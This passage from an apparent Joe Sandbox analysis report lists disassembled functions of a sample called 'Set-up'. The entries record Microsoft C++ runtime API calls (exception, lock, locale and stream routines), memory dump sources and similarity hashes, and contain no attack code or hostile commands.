                                                                                              • Instruction Fuzzy Hash: 0D118E31410208DFCB10CFA4C486ADEBBB4FF55320F908269D566A7290EB78974ADB60
                                                                                              Function 6BC19BE6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19BED
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19BFE
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19C1D
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC19C33
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19C40
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19C69
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              • Opcode ID: 1b219210615dc3d922037976c8777f10b15533d9d6bdcf146fd623d11dfa2d64
                                                                                              • Instruction ID: 82fa875441270977ab0be27e5c4e8e72ddae059fc400bb1ffd5717328965813a
                                                                                              • Opcode Fuzzy Hash: 1b219210615dc3d922037976c8777f10b15533d9d6bdcf146fd623d11dfa2d64
                                                                                              • Instruction Fuzzy Hash: FF119235510208DFCB14DFA4C45AADEBBB4FF14321F508559E592A7250EB3CA749DFA0
                                                                                              Function 6BC17F63 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC17F6A
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC17F7B
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC17F9A
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC17FB0
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17FBD
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17FE6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              • Opcode ID: 16a3c843a0ccecfe2985a510bc39170ab51c3ffcc63e42baa3946635ff9e8679
                                                                                              • Instruction ID: ec699452be6a2d83cceba4831c856b25cc4c42167127172eeb174615f96bba3e
                                                                                              • Opcode Fuzzy Hash: 16a3c843a0ccecfe2985a510bc39170ab51c3ffcc63e42baa3946635ff9e8679
                                                                                              • Instruction Fuzzy Hash: 90116D75510208DFCB14DFA4C44AADEBBB4FF14321F50815AE696E7290EB38A748DBA0
                                                                                              Function 6BC1AA9E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AAA5
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,0000001C), ref: 6BC1AAC1
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC1AAD7
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC1AAE3
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1AB0C
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1AB19
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_?set@event@ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 3618059816-988830941
                                                                                              • Opcode ID: be3388c1f9cf0afabb76b853605d72d0db309d0ce2ff7c29652d5463639c4a17
                                                                                              • Instruction ID: 726bc91314bf408bdec7586a10ce0f4ce68450a6d7c8bdd85d775debb981c0dc
                                                                                              • Opcode Fuzzy Hash: be3388c1f9cf0afabb76b853605d72d0db309d0ce2ff7c29652d5463639c4a17
                                                                                              • Instruction Fuzzy Hash: 8E01B575510204DFCB14CFA4C44AADEBBB4FF55350F504169E156A7250EB38D745DFA0
                                                                                              Function 6BC2AED8 Relevance: 12.2, APIs: 8, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC2AEDF
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000004C), ref: 6BC2AF09
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A9F5: __EH_prolog3.LIBCMT ref: 6BC2A9FC
                                                                                                • Part of subcall function 6BC2A9F5: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA06
                                                                                                • Part of subcall function 6BC2A9F5: int.LIBCPMT(00000000,00000014,6BC3EFCC,?), ref: 6BC2AA1D
                                                                                                • Part of subcall function 6BC2A9F5: std::locale::_Getfacet.LIBCPMT ref: 6BC2AA26
                                                                                                • Part of subcall function 6BC2A9F5: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EFCC,?), ref: 6BC2AA86
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • memmove_s.MSVCR100 ref: 6BC2AFC4
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC2B033
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2B049
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 6BC2B072
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC2B0A4
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC2B0C8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@_$V32@std::locale::facet::_$??1_?getloc@ios_base@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Putc@?$num_put@_Putgrouped@?$num_put@_Vlocale@2@memmove_sstd::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3216036925-0
                                                                                              • Opcode ID: 205360576d874f967a68a0c8b654a2979aaa656bf0881ca6178d938c01b66dad
                                                                                              • Instruction ID: 68501b59ac9021aad0c703f66d696b474d3ed4ae855f954dac3451c3b6088823
                                                                                              • Opcode Fuzzy Hash: 205360576d874f967a68a0c8b654a2979aaa656bf0881ca6178d938c01b66dad
                                                                                              • Instruction Fuzzy Hash: D07125B1C21209AFDF05CFA8D981AEEBBB5FF49300F10415AF965EB250E7389A55CB50
                                                                                              Function 6BC2ACC7 Relevance: 12.2, APIs: 8, Instructions: 194COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC2ACCE
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000004C), ref: 6BC2ACF8
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A952: __EH_prolog3.LIBCMT ref: 6BC2A959
                                                                                                • Part of subcall function 6BC2A952: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A963
                                                                                                • Part of subcall function 6BC2A952: int.LIBCPMT(00000000,00000014,6BC3E9EA,?), ref: 6BC2A97A
                                                                                                • Part of subcall function 6BC2A952: std::locale::_Getfacet.LIBCPMT ref: 6BC2A983
                                                                                                • Part of subcall function 6BC2A952: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E9EA,?), ref: 6BC2A9E3
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • memmove_s.MSVCR100 ref: 6BC2ADB3
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000), ref: 6BC2AE22
                                                                                              • ?_Putc@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?), ref: 6BC2AE38
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 6BC2AE61
                                                                                              • ?_Putgrouped@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@PBDI_W@Z.MSVCP100(?,?,?,?,?,?,?), ref: 6BC2AE93
                                                                                              • ?_Rep@?$num_put@_WV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@_WU?$char_traits@_W@std@@@2@V32@_WI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC2AEB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_V?$ostreambuf_iterator@_$W@std@@@2@W@std@@@std@@@std@@$Rep@?$num_put@_V32@_$V32@std::locale::facet::_$??1_?getloc@ios_base@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Putc@?$num_put@_Putgrouped@?$num_put@_Vlocale@2@memmove_sstd::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 3216036925-0
                                                                                              • Opcode ID: 9a467ca5e6fe03c041fb4adf0c09f70513625b3646978bc9550d45066a7742e5
                                                                                              • Instruction ID: 20a5a5c6f6bf829fb6cbaf891246438352aaae88ba46de6bdfa338927fe48cbb
                                                                                              • Opcode Fuzzy Hash: 9a467ca5e6fe03c041fb4adf0c09f70513625b3646978bc9550d45066a7742e5
                                                                                              • Instruction Fuzzy Hash: 7C715875C21208AFDF05CFA8D981AEEBBB6FF49301F104059F851AB250E7389A55CB50
                                                                                              Function 6BC2AABF Relevance: 12.2, APIs: 8, Instructions: 191COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC2AAC6
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000004C), ref: 6BC2AAF2
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A8AF: __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                                • Part of subcall function 6BC2A8AF: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC2A8AF: int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC2A8AF: std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC2A8AF: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • memmove_s.MSVCR100 ref: 6BC2ABA7
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,?,0000004C), ref: 6BC2AC0E
                                                                                              • ?_Putc@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDI@Z.MSVCP100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000004C), ref: 6BC2AC26
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,00000000,?,?,00000000,?,?,?,?,?,?), ref: 6BC2AC4E
                                                                                              • ?_Putgrouped@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@PBDID@Z.MSVCP100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BC2AC82
                                                                                              • ?_Rep@?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABA?AV?$ostreambuf_iterator@DU?$char_traits@D@std@@@2@V32@DI@Z.MSVCP100(?,?,?,?,?,00000000,?,?,?,?,?,?,?), ref: 6BC2ACA6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@V?$ostreambuf_iterator@$D@std@@@2@D@std@@@std@@@std@@V32@$Rep@?$num_put@$std::locale::facet::_$??1_?getloc@ios_base@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Putc@?$num_put@Putgrouped@?$num_put@Vlocale@2@memmove_sstd::_std::locale::_
                                                                                              • String ID:
                                                                                              • API String ID: 1048808752-0
                                                                                              • Opcode ID: 96dd2892fd82fb25d8263ce3c20e4faf9fe2ef1863a7bb9ec377efda6a13ccd6
                                                                                              • Instruction ID: 73721d7456480d350d75c9e03d59330d44c4ea1fce8ae133cec857a81e89833e
                                                                                              • Opcode Fuzzy Hash: 96dd2892fd82fb25d8263ce3c20e4faf9fe2ef1863a7bb9ec377efda6a13ccd6
                                                                                              • Instruction Fuzzy Hash: 1D715979C15208EFCF11CFA8D980ADEBBB6FF89300F10405AF955AB260E7399A51CB50
                                                                                              Function 6BC3923D Relevance: 12.1, APIs: 8, Instructions: 72COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC39244
                                                                                              • std::_Lockit::_Lockit.LIBCPMT(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC3924E
                                                                                                • Part of subcall function 6BC3B440: _Mtxlock.MSVCP100(?,?,?,6BC1B68B,00000000,00000010), ref: 6BC3B45B
                                                                                              • _realloc_crt.MSVCR100(?,?,00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004), ref: 6BC39276
                                                                                              • ??0exception@std@@QAE@ABV01@@Z.MSVCR100(6BC70E9C,?,00000004), ref: 6BC392AD
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC392C3
                                                                                              • std::locale::facet::_Incref.LIBCPMT(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC392E2
                                                                                              • std::locale::facet::_Decref.LIBCPMT(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC392F5
                                                                                              • ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000010,6BC41C76,?,00000000,00000000,?,00000008,6BC3961F,?,?,?,?,00000004,6BC3969A,?), ref: 6BC39316
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: std::locale::facet::_$??0exception@std@@??1_DecrefExceptionH_prolog3IncrefLockitLockit::_Lockit@std@@MtxlockThrowV01@@_realloc_crtstd::_
                                                                                              • String ID:
                                                                                              • API String ID: 5258697-0
                                                                                              • Opcode ID: 72bc3cfd8ed478d96d66fc3c7feeb6b411fe804f9471b035cfb35455796d123b
                                                                                              • Instruction ID: 932a49031ed3c31a3ab71f0c6d88cf33f977f60c3d886264d21142029ba60d72
                                                                                              • Opcode Fuzzy Hash: 72bc3cfd8ed478d96d66fc3c7feeb6b411fe804f9471b035cfb35455796d123b
                                                                                              • Instruction Fuzzy Hash: 5321B431520A159FDB10DF65C482BA977B1FF85325F408468D4A79B291EF7AEB40CF10
                                                                                              Function 6BC1DE78 Relevance: 10.6, APIs: 7, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1DE7F
                                                                                              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEA2
                                                                                                • Part of subcall function 6BC1DA36: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,?,?,6BC39160,6BC1CD3D), ref: 6BC1DA67
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEC7
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DEF0
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1DF19
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,00000014), ref: 6BC1DF4B
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D687,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DF9F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?snextc@?$basic_streambuf@_H_prolog3_catchV12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4098380366-0
                                                                                              • Opcode ID: 18a09e7049115a3009c6a135fe3877aa0822b726f4b87578b6605bb34c112cf1
                                                                                              • Instruction ID: 854d49cdc5a1c4540486bf4fdd7c92e2de283b7e2bb12f3906f1deb4d085b42b
                                                                                              • Opcode Fuzzy Hash: 18a09e7049115a3009c6a135fe3877aa0822b726f4b87578b6605bb34c112cf1
                                                                                              • Instruction Fuzzy Hash: C631A0746691009FC714DF68C0D0A29B7B1AF4430876484ADE186AB341EB39DF42EB40
                                                                                              Function 6BC1E00D Relevance: 10.6, APIs: 7, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1E014
                                                                                              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E037
                                                                                                • Part of subcall function 6BC1DA36: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,?,?,6BC39160,6BC1CD3D), ref: 6BC1DA67
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E05C
                                                                                              • ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E085
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,?,?,?,?,?,00000014), ref: 6BC1E0AE
                                                                                              • ?snextc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,?,?,?,?,00000014), ref: 6BC1E0E0
                                                                                              • ?clear@ios_base@std@@QAEXH_N@Z.MSVCP100(?,00000000,00000008,6BC1D7AB,00000001,?,?,?,?,?,?,00000014), ref: 6BC1E134
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_W@std@@@std@@$?clear@ios_base@std@@$?flush@?$basic_ostream@_?getloc@ios_base@std@@?setstate@?$basic_ios@_?sgetc@?$basic_streambuf@_?snextc@?$basic_streambuf@_H_prolog3_catchV12@Vlocale@2@
                                                                                              • String ID:
                                                                                              • API String ID: 4098380366-0
                                                                                              • Opcode ID: 46fa433c71acb5d8072815ae90c3e165a6ad1b2ffb5240a4901fbdf59cf116e2
                                                                                              • Instruction ID: 8542e48e51eb6b502490c4a0b4998fdb5ba77bee25c1bea25c48670a693f2c62
                                                                                              • Opcode Fuzzy Hash: 46fa433c71acb5d8072815ae90c3e165a6ad1b2ffb5240a4901fbdf59cf116e2
                                                                                              • Instruction Fuzzy Hash: 8E319F746281018FCB14DF68C4D0E69B7B5FF44308B6484ADE186AB742EB3ADF42EB40
                                                                                              Function 6BC1DC96 Relevance: 10.6, APIs: 7, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3_catch.LIBCMT ref: 6BC1DC9D
                                                                                              • ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12@XZ.MSVCP100(00000008,6BC1D577,00000001,?,?,?,?,?,?,00000014), ref: 6BC1DCC0
                                                                                                • Part of subcall function 6BC1DA36: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP100(00000000,00000000,?,?,6BC39160,6BC1CD3D), ref: 6BC1DA67
